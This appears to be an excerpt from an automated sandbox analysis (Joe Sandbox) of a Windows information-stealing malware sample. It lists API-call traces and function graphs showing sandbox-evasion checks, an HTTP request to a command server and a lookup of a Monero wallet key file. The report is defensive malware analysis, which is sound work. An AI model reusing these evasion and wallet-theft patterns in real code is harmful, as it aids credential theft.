                              • GetProcAddress.KERNEL32(77190000,00DD6230), ref: 00FC9FCA
                              • GetProcAddress.KERNEL32(77190000,00DEC3D8), ref: 00FC9FE2
                              • GetProcAddress.KERNEL32(77190000,00DEC378), ref: 00FC9FFA
                              • GetProcAddress.KERNEL32(77190000,00DD6270), ref: 00FCA013
                              • GetProcAddress.KERNEL32(77190000,00DD62B0), ref: 00FCA02B
                              • LoadLibraryA.KERNEL32(00DEC270,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA03D
                              • LoadLibraryA.KERNEL32(00DEC390,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA04E
                              • LoadLibraryA.KERNEL32(00DEC360,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA060
                              • LoadLibraryA.KERNEL32(00DEC2D0,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA072
                              • LoadLibraryA.KERNEL32(00DEC3A8,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA083
                              • LoadLibraryA.KERNEL32(00DEC318,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA095
                              • LoadLibraryA.KERNEL32(00DEC3C0,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA0A7
                              • LoadLibraryA.KERNEL32(00DEC210,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA0B8
                              • GetProcAddress.KERNEL32(77040000,00DD5E30), ref: 00FCA0DA
                              • GetProcAddress.KERNEL32(77040000,00DEC228), ref: 00FCA0F2
                              • GetProcAddress.KERNEL32(77040000,00DE9048), ref: 00FCA10A
                              • GetProcAddress.KERNEL32(77040000,00DEC2B8), ref: 00FCA123
                              • GetProcAddress.KERNEL32(77040000,00DD5EB0), ref: 00FCA13B
                              • GetProcAddress.KERNEL32(705A0000,00DDAB48), ref: 00FCA160
                              • GetProcAddress.KERNEL32(705A0000,00DD5DD0), ref: 00FCA179
                              • GetProcAddress.KERNEL32(705A0000,00DDAAF8), ref: 00FCA191
                              • GetProcAddress.KERNEL32(705A0000,00DEC240), ref: 00FCA1A9
                              • GetProcAddress.KERNEL32(705A0000,00DEC288), ref: 00FCA1C2
                              • GetProcAddress.KERNEL32(705A0000,00DD5C90), ref: 00FCA1DA
                              • GetProcAddress.KERNEL32(705A0000,00DD5C50), ref: 00FCA1F2
                              • GetProcAddress.KERNEL32(705A0000,00DEC2A0), ref: 00FCA20B
                              • GetProcAddress.KERNEL32(768D0000,00DD5DB0), ref: 00FCA22C
                              • GetProcAddress.KERNEL32(768D0000,00DD5BD0), ref: 00FCA244
                              • GetProcAddress.KERNEL32(768D0000,00DEC2E8), ref: 00FCA25D
                              • GetProcAddress.KERNEL32(768D0000,00DEC330), ref: 00FCA275
                              • GetProcAddress.KERNEL32(768D0000,00DD5D70), ref: 00FCA28D
                              • GetProcAddress.KERNEL32(75790000,00DDAAA8), ref: 00FCA2B3
                              • GetProcAddress.KERNEL32(75790000,00DDADA0), ref: 00FCA2CB
                              • GetProcAddress.KERNEL32(75790000,00DEC538), ref: 00FCA2E3
                              • GetProcAddress.KERNEL32(75790000,00DD5D90), ref: 00FCA2FC
                              • GetProcAddress.KERNEL32(75790000,00DD5BB0), ref: 00FCA314
                              • GetProcAddress.KERNEL32(75790000,00DDAA58), ref: 00FCA32C
                              • GetProcAddress.KERNEL32(75A10000,00DEC490), ref: 00FCA352
                              • GetProcAddress.KERNEL32(75A10000,00DD5D10), ref: 00FCA36A
                              • GetProcAddress.KERNEL32(75A10000,00DE9058), ref: 00FCA382
                              • GetProcAddress.KERNEL32(75A10000,00DEC598), ref: 00FCA39B
                              • GetProcAddress.KERNEL32(75A10000,00DEC478), ref: 00FCA3B3
                              • GetProcAddress.KERNEL32(75A10000,00DD5B90), ref: 00FCA3CB
                              • GetProcAddress.KERNEL32(75A10000,00DD5ED0), ref: 00FCA3E4
                              • GetProcAddress.KERNEL32(75A10000,00DEC508), ref: 00FCA3FC
                              • GetProcAddress.KERNEL32(75A10000,00DEC4A8), ref: 00FCA414
                              • GetProcAddress.KERNEL32(76850000,00DD5C30), ref: 00FCA436
                              • GetProcAddress.KERNEL32(76850000,00DEC520), ref: 00FCA44E
                              • GetProcAddress.KERNEL32(76850000,00DEC430), ref: 00FCA466
                              • GetProcAddress.KERNEL32(76850000,00DEC550), ref: 00FCA47F
                              • GetProcAddress.KERNEL32(76850000,00DEC568), ref: 00FCA497
                              • GetProcAddress.KERNEL32(75690000,00DD5D30), ref: 00FCA4B8
                              • GetProcAddress.KERNEL32(75690000,00DD5BF0), ref: 00FCA4D1
                              • GetProcAddress.KERNEL32(769C0000,00DD5C10), ref: 00FCA4F2
                              • GetProcAddress.KERNEL32(769C0000,00DEC418), ref: 00FCA50A
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5B50), ref: 00FCA530
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5B30), ref: 00FCA548
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5E50), ref: 00FCA560
                              • GetProcAddress.KERNEL32(6F8D0000,00DEC580), ref: 00FCA579
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5C70), ref: 00FCA591
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5E70), ref: 00FCA5A9
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5DF0), ref: 00FCA5C2
                              • GetProcAddress.KERNEL32(6F8D0000,00DD5E10), ref: 00FCA5DA
                              • GetProcAddress.KERNEL32(6F8D0000,InternetSetOptionA), ref: 00FCA5F1
                              • GetProcAddress.KERNEL32(6F8D0000,HttpQueryInfoA), ref: 00FCA607
                              • GetProcAddress.KERNEL32(75D90000,00DEC5B0), ref: 00FCA629
                              • GetProcAddress.KERNEL32(75D90000,00DE9068), ref: 00FCA641
                              • GetProcAddress.KERNEL32(75D90000,00DEC5C8), ref: 00FCA659
                              • GetProcAddress.KERNEL32(75D90000,00DEC5E0), ref: 00FCA672
                              • GetProcAddress.KERNEL32(76470000,00DD5CB0), ref: 00FCA693
                              • GetProcAddress.KERNEL32(70220000,00DEC4D8), ref: 00FCA6B4
                              • GetProcAddress.KERNEL32(70220000,00DD5EF0), ref: 00FCA6CD
                              • GetProcAddress.KERNEL32(70220000,00DEC4F0), ref: 00FCA6E5
                              • GetProcAddress.KERNEL32(70220000,00DEC4C0), ref: 00FCA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: d2642b652b4baf44aad9eab66d6ad995b910738784057efdb7c84a050902d041
                              • Instruction ID: 374c07b6b46ec172802d9d7f9983b42979c41e2758c9cda8f62d052575212c01
                              • Opcode Fuzzy Hash: d2642b652b4baf44aad9eab66d6ad995b910738784057efdb7c84a050902d041
                              • Instruction Fuzzy Hash: 52621AB5500A01AFC36CDBA9F598D5637F9EF8C242714863EA62EC324CD67EA4C1DB50

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                                • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                              • StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,00DEE100,00000000,00000000,00400100,00000000), ref: 00FB6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00FB63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FB646D
                              • InternetCloseHandle.WININET(00000000), ref: 00FB64EF
                              • InternetCloseHandle.WININET(00000000), ref: 00FB64F9
                              • InternetCloseHandle.WININET(00000000), ref: 00FB6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 5fa7e091fc63e480b30b2cb6c74d33468b877813fcd4f175647735efb88bbe32
                              • Instruction ID: 910dbc133d20dedb80586d88d6c6fb1adb3fb88b228db10e67c409018384e9a2
                              • Opcode Fuzzy Hash: 5fa7e091fc63e480b30b2cb6c74d33468b877813fcd4f175647735efb88bbe32
                              • Instruction Fuzzy Hash: A1713C71A00218EBDB24DBA0DC49FEE7778BF44704F1081A9F10AAB1C4DBB96A85DF51

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00FCA820: lstrlen.KERNEL32(00FB4F05,?,?,00FB4F05,00FD0DDE), ref: 00FCA82B
                                • Part of subcall function 00FCA820: lstrcpy.KERNEL32(00FD0DDE,00000000), ref: 00FCA885
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5857
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FC51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5228
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5318
                                • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC532F
                                • Part of subcall function 00FC52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00FC5364
                                • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC5383
                                • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00FC5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 87c8293d430d93d12cda99f0dcf9cd6edf976be8d4e4790d9a45ef6d2894e754
                              • Instruction ID: 784de1447d2df7fed72fe1cd410ff1acad1d06a224a891ccbd3827cf0b66bc58
                              • Opcode Fuzzy Hash: 87c8293d430d93d12cda99f0dcf9cd6edf976be8d4e4790d9a45ef6d2894e754
                              • Instruction Fuzzy Hash: 1AE13E729101099BCB18FBA0EE57FED7338AF54704F44812CA416571D5EF38BA49EBA2

                              Control-flow Graph

                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00FC17C5
                              • ExitProcess.KERNEL32 ref: 00FC17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 4d68e126b3968c62881f117012788353137af240c60f58ae72ac43dc948f150a
                              • Instruction ID: a914c61b47a7eea8cf66859bfa4ed164794a9dfe374a36fba5e59df3ae990513
                              • Opcode Fuzzy Hash: 4d68e126b3968c62881f117012788353137af240c60f58ae72ac43dc948f150a
                              • Instruction Fuzzy Hash: 6B519DB5A0420AEBCB04DFA0DA56FBE37B6BF44704F10405DE41AA7341DB74E961EB62

                              Control-flow Graph

                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FC7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FC757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC760A
                              • wsprintfA.USER32 ref: 00FC7640
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 186c4fd966f13d28e794d9c394a3db1100a680088ad5755af89cba24358b1045
                              • Instruction ID: 2712be0a69d85e1007cea3d592c4c9894c0f4f8c950142022b12f07c1e62627c
                              • Opcode Fuzzy Hash: 186c4fd966f13d28e794d9c394a3db1100a680088ad5755af89cba24358b1045
                              • Instruction Fuzzy Hash: 4A418FB1D04349ABDB10DB94DD46FEEBBB8AF48714F10019CF50967280DB78AA84DFA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DDDBB0), ref: 00FC98A1
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DDDBE0), ref: 00FC98BA
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DDDAA8), ref: 00FC98D2
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8C40), ref: 00FC98EA
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8CD0), ref: 00FC9903
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE9168), ref: 00FC991B
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DD5FF0), ref: 00FC9933
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DD5FB0), ref: 00FC994C
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8CA0), ref: 00FC9964
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8D48), ref: 00FC997C
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8BC8), ref: 00FC9995
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8C10), ref: 00FC99AD
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DD6130), ref: 00FC99C5
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8BE0), ref: 00FC99DE
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FB11D0: ExitProcess.KERNEL32 ref: 00FB1211
                                • Part of subcall function 00FB1160: GetSystemInfo.KERNEL32(?), ref: 00FB116A
                                • Part of subcall function 00FB1160: ExitProcess.KERNEL32 ref: 00FB117E
                                • Part of subcall function 00FB1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB112B
                                • Part of subcall function 00FB1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB1132
                                • Part of subcall function 00FB1110: ExitProcess.KERNEL32 ref: 00FB1143
                                • Part of subcall function 00FB1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FB123E
                                • Part of subcall function 00FB1220: __aulldiv.LIBCMT ref: 00FB1258
                                • Part of subcall function 00FB1220: __aulldiv.LIBCMT ref: 00FB1266
                                • Part of subcall function 00FB1220: ExitProcess.KERNEL32 ref: 00FB1294
                                • Part of subcall function 00FC6770: GetUserDefaultLangID.KERNEL32 ref: 00FC6774
                                • Part of subcall function 00FB1190: ExitProcess.KERNEL32 ref: 00FB11C6
                                • Part of subcall function 00FC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                                • Part of subcall function 00FC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                                • Part of subcall function 00FC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                                • Part of subcall function 00FC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                                • Part of subcall function 00FC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                                • Part of subcall function 00FC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DE90A8,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FC6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00FC6AF9
                              • Sleep.KERNEL32(00001770), ref: 00FC6B04
                              • CloseHandle.KERNEL32(?,00000000,?,00DE90A8,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6B1A
                              • ExitProcess.KERNEL32 ref: 00FC6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 8f4e06549d4691621c896dfa246ecd627770b39dedce45e44480e27fc5f12819
                              • Instruction ID: b35c8548161423df7e642f36d339c121d77aba8d82cd1ddf829594c1ae7bec43
                              • Opcode Fuzzy Hash: 8f4e06549d4691621c896dfa246ecd627770b39dedce45e44480e27fc5f12819
                              • Instruction Fuzzy Hash: 53310B7190420EAADB18F7A0ED57FEE7778AF44304F50452CF212A21C1DF786945EBA6

                               Control-flow Graph (function fb1220; basic blocks and edges recovered from the graph data, node numbers are the graph's own)
                               • 1436 fb1220-fb1247: call fc89b0, GlobalMemoryStatusEx -> 1439, 1440
                               • 1439 fb1249-fb1271: call fcda00 x2 (the two __aulldiv calls at 00FB1258 and 00FB1266) -> 1442
                               • 1440 fb1273-fb127a -> 1442
                               • 1442 fb1281-fb1285 -> 1444, 1445
                               • 1444 fb129a-fb129d (no successors)
                               • 1445 fb1287 -> 1447, 1448
                               • 1447 fb1289-fb1290 -> 1444, 1448
                               • 1448 fb1292-fb1294: ExitProcess
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FB123E
                              • __aulldiv.LIBCMT ref: 00FB1258
                              • __aulldiv.LIBCMT ref: 00FB1266
                              • ExitProcess.KERNEL32 ref: 00FB1294
                              Strings
                               Memory Dump Source (same dump set as listed for the preceding function)
                               • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 3e253fbad67b38f9cdcf73424743f2889f635da81a3b6474b01da4633d313ec3
                              • Instruction ID: 2e3791b1631e9d52ccfa9ff31ae6c7bd0cb1f0acc773e526b095fd47577329d9
                              • Opcode Fuzzy Hash: 3e253fbad67b38f9cdcf73424743f2889f635da81a3b6474b01da4633d313ec3
                              • Instruction Fuzzy Hash: 74014BB0D40308AAEB10DBE1DC4ABAEBB78BF04701F608068E605B6280D67866459B99

                               Control-flow Graph (function fc6aba; basic blocks and edges recovered from the graph data, node numbers are the graph's own)
                               • 1450 fc6af3 -> 1451
                               • 1451 fc6b0a -> 1453, 1454
                               • 1453 fc6b0c-fc6b22: call fc6920, call fc5b10, CloseHandle, ExitProcess
                               • 1454 fc6aba-fc6ad7: call fcaad0, OpenEventA -> 1459, 1460
                               • 1459 fc6ad9-fc6af1: call fcaad0, CreateEventA -> 1453
                               • 1460 fc6af5-fc6b04: CloseHandle, Sleep -> 1451
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DE90A8,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FC6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00FC6AF9
                              • Sleep.KERNEL32(00001770), ref: 00FC6B04
                              • CloseHandle.KERNEL32(?,00000000,?,00DE90A8,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6B1A
                              • ExitProcess.KERNEL32 ref: 00FC6B22
                               Memory Dump Source (same dump set as listed for the preceding function)
                               • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: e325c05725a5fd67ae57e791491075f8be4802e217d0ce9ae5e132d42ff001dd
                              • Instruction ID: f2b777320bddb0558cbf8d1f16d76a1efc2a2a4c35397fabce51c643f401d920
                              • Opcode Fuzzy Hash: e325c05725a5fd67ae57e791491075f8be4802e217d0ce9ae5e132d42ff001dd
                              • Instruction Fuzzy Hash: BDF0307094420BAAE714ABA0AE07F7D7B74EF44705F10452CB527E2181DBB86981F755

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                              Strings
                               Memory Dump Source (same dump set as listed for the preceding function)
                               • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: e416036c6507d5a5469ff35e40361f83c54e8eee31d643c93c755b69b9086fc4
                              • Instruction ID: 32651583962b4a2034a39dbd0a033f57a97f879635b1e99ee609d3cdf2534bac
                              • Opcode Fuzzy Hash: e416036c6507d5a5469ff35e40361f83c54e8eee31d643c93c755b69b9086fc4
                              • Instruction Fuzzy Hash: 27212FB1D00209ABDF14EFA5ED4ABDD7B74FB44310F108629E525A72C0DB746609DB91

                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB6280: InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                                • Part of subcall function 00FB6280: StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB6303
                                • Part of subcall function 00FB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                                • Part of subcall function 00FB6280: HttpOpenRequestA.WININET(00000000,GET,?,00DEE100,00000000,00000000,00400100,00000000), ref: 00FB6385
                                • Part of subcall function 00FB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                                • Part of subcall function 00FB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5228
                              Strings
                               Memory Dump Source (same dump set as listed for the preceding function)
                               • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 125695dd08d501fe21d1d846b4fcc015415a0b6bfe5de77bae986e875a908152
                              • Instruction ID: 5ca118c45b310877e2c0459afa5c05bb17a3a3ae7f73012344c495b8d407527b
                              • Opcode Fuzzy Hash: 125695dd08d501fe21d1d846b4fcc015415a0b6bfe5de77bae986e875a908152
                              • Instruction Fuzzy Hash: B711F830900009ABCB18FB61DE57FED7378AF50304F80415CA81A4A192EF38BB15EA92
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB1132
                              • ExitProcess.KERNEL32 ref: 00FB1143
                               Memory Dump Source (same dump set as listed for the preceding function)
                               • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: d435aa593cec33fc1fd0b6295fb9b58112fa3b547148d7639fa6e33461f4167c
                              • Instruction ID: 75fcfaf015bf4fbe6b0a833dae08aef115dd6222ef7aaf758c1723f241da6c4d
                              • Opcode Fuzzy Hash: d435aa593cec33fc1fd0b6295fb9b58112fa3b547148d7639fa6e33461f4167c
                              • Instruction Fuzzy Hash: 16E08670945308FBE7246BA1EC1AB48767CAF04B02F500158F70D771C4C6F926419B98
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FB10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00FB10F7
                               Memory Dump Source (same dump set as listed for the preceding function)
